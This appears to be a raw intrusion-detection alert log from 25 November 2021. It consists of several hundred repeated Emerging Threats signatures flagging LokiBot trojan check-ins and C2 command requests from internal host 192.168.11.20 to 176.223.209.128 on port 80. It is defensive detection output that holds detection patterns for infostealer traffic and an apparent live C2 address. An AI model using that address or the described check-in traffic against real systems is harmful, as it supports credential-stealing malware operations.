                                              11/25/21-10:48:46.527621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:46.527621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:46.527621TCP2025381ET TROJAN LokiBot Checkin4990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:46.527621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2025381ET TROJAN LokiBot Checkin4990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.107853TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2025381ET TROJAN LokiBot Checkin4991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:47.685832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2025381ET TROJAN LokiBot Checkin4991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.224670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2025381ET TROJAN LokiBot Checkin4991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:48.828094TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2025381ET TROJAN LokiBot Checkin4991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.359585TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2025381ET TROJAN LokiBot Checkin4991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:49.936381TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.11.20176.223.209.128
                                              11/25/21-10:48:50.496916TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.11.20176.223.209.128
                                              11/25/21-10:48:50.496916TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.11.20176.223.209.128
                                              11/25/21-10:48:50.496916TCP2025381ET TROJAN LokiBot Checkin4991680192.168.11.20176.223.209.128
                                              11/25/21-10:48:50.496916TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2025381ET TROJAN LokiBot Checkin4991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.019889TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2025381ET TROJAN LokiBot Checkin4991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:51.567286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2025381ET TROJAN LokiBot Checkin4991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.111718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2025381ET TROJAN LokiBot Checkin4992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:52.644466TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2025381ET TROJAN LokiBot Checkin4992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.244344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2025381ET TROJAN LokiBot Checkin4992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:53.818084TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2025381ET TROJAN LokiBot Checkin4992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.400388TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2025381ET TROJAN LokiBot Checkin4992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:54.951317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2025381ET TROJAN LokiBot Checkin4992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:55.484489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2025381ET TROJAN LokiBot Checkin4992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.007948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2025381ET TROJAN LokiBot Checkin4992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:56.507759TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2025381ET TROJAN LokiBot Checkin4992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.040797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2025381ET TROJAN LokiBot Checkin4992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:57.544069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2025381ET TROJAN LokiBot Checkin4993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.081848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2025381ET TROJAN LokiBot Checkin4993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:58.604842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2025381ET TROJAN LokiBot Checkin4993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.185834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2025381ET TROJAN LokiBot Checkin4993380192.168.11.20176.223.209.128
                                              11/25/21-10:48:59.754447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2025381ET TROJAN LokiBot Checkin4993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.325952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2025381ET TROJAN LokiBot Checkin4993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:00.885502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2025381ET TROJAN LokiBot Checkin4993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.341393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2025381ET TROJAN LokiBot Checkin4993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:01.916305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2025381ET TROJAN LokiBot Checkin4993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:02.470140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2025381ET TROJAN LokiBot Checkin4993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.002783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2025381ET TROJAN LokiBot Checkin4994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.489951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994080192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2025381ET TROJAN LokiBot Checkin4994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:03.973710TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2025381ET TROJAN LokiBot Checkin4994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:04.469326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2025381ET TROJAN LokiBot Checkin4994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.006357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994380192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2025381ET TROJAN LokiBot Checkin4994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:05.526807TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2025381ET TROJAN LokiBot Checkin4994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.029714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2025381ET TROJAN LokiBot Checkin4994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:06.509232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2025381ET TROJAN LokiBot Checkin4995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.028730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2025381ET TROJAN LokiBot Checkin4995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:07.550027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2025381ET TROJAN LokiBot Checkin4995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.046702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995280192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2025381ET TROJAN LokiBot Checkin4995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:08.502494TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2025381ET TROJAN LokiBot Checkin4995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.053477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2025381ET TROJAN LokiBot Checkin4995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:09.583942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2025381ET TROJAN LokiBot Checkin4995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.109387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2025381ET TROJAN LokiBot Checkin4995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:10.657392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2025381ET TROJAN LokiBot Checkin4995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.180607TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2025381ET TROJAN LokiBot Checkin4995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:11.643885TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2025381ET TROJAN LokiBot Checkin4996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.083953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2025381ET TROJAN LokiBot Checkin4996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:12.560857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2025381ET TROJAN LokiBot Checkin4996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.092995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2025381ET TROJAN LokiBot Checkin4996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:13.622408TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2025381ET TROJAN LokiBot Checkin4996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.137401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2025381ET TROJAN LokiBot Checkin4996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:14.671375TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2025381ET TROJAN LokiBot Checkin4996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.151567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2025381ET TROJAN LokiBot Checkin4996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:15.668863TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2025381ET TROJAN LokiBot Checkin4996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.184502TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2025381ET TROJAN LokiBot Checkin4997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:16.721053TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.213581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.11.20176.223.209.128
